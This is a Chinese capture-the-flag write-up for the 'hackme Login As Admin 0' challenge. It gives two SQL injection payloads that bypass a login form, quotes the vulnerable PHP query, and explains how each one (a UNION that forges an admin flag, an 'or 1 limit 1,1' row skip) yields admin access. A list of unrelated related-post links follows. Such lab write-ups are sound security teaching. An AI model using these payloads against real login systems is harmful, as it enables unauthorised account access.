hackme_Login As Admin 0
先上payload, 再说原理
1、
Username:\' union select 1,1,1,1#
Password:a
2、
Username:\' or 1 limit1,1#
Password:a
下面是分析讲解:
首先,点击Source Code按钮查看源代码
可以得到以下信息:
1、过滤了单引号,可以用\'来绕过滤
2、user表中四个列:id,user,pass,is_admin
3、SQL语句:
$sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'", $_POST['name'], $_POST['password']);
4、Password不能为空
一、Payload1分析:
我们的目的是以admin身份登录,那么服务器如何来判断我们是不是admin呢?
拉到最后来看:
可以看到,最重要的是就是is_admin这个字段,所以我们来进行变量覆盖注入(我自己取的名字、、请大佬指正)
padload提交后,提交的SQL语句是:
SELECT * FROM 'user' WHERE 'user' = '' union select 1,1,1,1 # AND `password` = 'a';
执行的是:
SELECT 1,1,1,1 FROM ’user‘;
那我们得到了一个$user的实例,其中最关键的就是第4个变量值是1
二、Payload2分析:
第二种其实也是老套路,我管他叫“限制查询注入”(自己取的名字、、请大佬指正)
首先构造Payload:
Username:\' or 1#
Password:a
这句话提交上去相当于:
SELECT * FROM 'user' WHERE 1
显然,我们会得到整个user表。
但是只有整张表的第一个会被验证,所以这个payload提交上去发现我们不是管理员而是guest,猜想admin应该是在下一条数据
所以我们让offset=1,构造payload:
Username:\' or 1 limit 1,1#
Password:a
转载于:https://www.cnblogs.com/huangming-zzz/p/9818486.html
hackme_Login As Admin 0相关推荐
- mongodb 3.0.x 添加用户名和密码设置权限
mongodb 3.0.x 添加用户名,密码,权限设置 最近遇到关于mongodb 3.0.x权限设置的问题,做了一下总结: 第一给mongodb 3.0.x 添加user 第一步修改配置文件: xx ...
- openssl 版本区别_冰蝎的前世今生:3.0新版本下的一些防护思考
微信又改版了,为了我们能一直相见 你的加星和在看对我们非常重要 点击"长亭安全课堂"--主页右上角--设为星标? 期待与你的每次见面- 冰蝎(Behinder)是国内黑客圈较火的一 ...
- Dubbo Admin —— Spring Cloud Alibaba 2021.1 + Nacos + Dubbo Admin参考配置
环境配置 <dependencyManagement><dependencies><!--Spring Boot--><dependency><g ...
- 新手小白Linux(Centos6.5)部署java web项目(mongodb4.0.2安装及相关操作)
红帽企业或CentOS的Linux上安装MongoDB的社区版: https://docs.mongodb.com/manual/tutorial/install-mongodb-on-red-hat ...
- 使用docker下载并安装mongodb5.0.5
1.安装docker和docker-compose 1.1 安装docker软件 yum install -y docker1.2 启动docker并将docker加入开机启动 systemctl s ...
- Mongodb 3.0 创建用户
MongoDB 3.0 安全权限访问控制,在添加用户上面3.0版本和之前的版本有很大的区别,这里就说明下3.0的添加用户的方法. 创建第一个用户(该用户需要有grant权限,即:账号管理的授权权限) ...
- Docker mongo:5.0
1.拉取 [root@Tseng-HW ~]# docker pull mongo:5.0 5.0: Pulling from library/mongo 7b1a6ab2e44d: Pull com ...
- 0. DRF之软件开发模式CBV源码解析
文章目录 1. Web应用模式 1.1 动/静态页面 1.2 前后端不分离 1. 3前后端分离 1.4 JSON/XML数据格式 1. json格式 2. xml格式 1.5 服务器页面后缀 2. A ...
- 数据库应用----Mongodb 4.0 版本 基础操作---复制集,选举方法、部署认证 (二)
Mongodb 4.0 版本 基础操作-复制集,选举方法.部署认证 (二) 文章目录 Mongodb 4.0 版本 基础操作---复制集,选举方法.部署认证 (二) 一.MongoDB 复制集 二.部 ...
最新文章
- 使用MongoDB存储Docker日志(续)
- FPGA硬件构成详解
- Failed to invoke the method subscribe in the service com.alibaba.dubbo.registry.RegistryService
- .NET Core:新的快速开发平台
- 对于刚开始使用该软件,应该在熟悉基本的markdown语法的基础上,再进行快捷键的使用!...
- 审车按月还是日期_@老司机,你该审车了,秒懂的审车攻略,快快揣口袋吧
- flume数据采集_大数据采集系统Flume集群部署
- win10用不了php_WIN10用不了
- iOS ViewController利用代理页面传值
- Linux内核源代码分析-第二章 代码初识-2
- mysql检查所作的修正_MySQL常见故障检测和修正_mysql
- linux shell文件转码命令:iconv
- Some file crunching failed, see logs for details解决办法
- 0x8007000e错误
- 【算法】扩展卢卡斯详解
- CVPR 2021 Oral | Transformer再发力!华南理工和微信提出UP-DETR:无监督预训练检测器...
- LoRa 扩频因子和码片
- 树莓派3B 安装微雪LCD5inch显示器(包含软键盘)
- 谷歌变坏了?Chrome 已成众矢之的
- 如何精准引流?看完这篇文章你将成为高手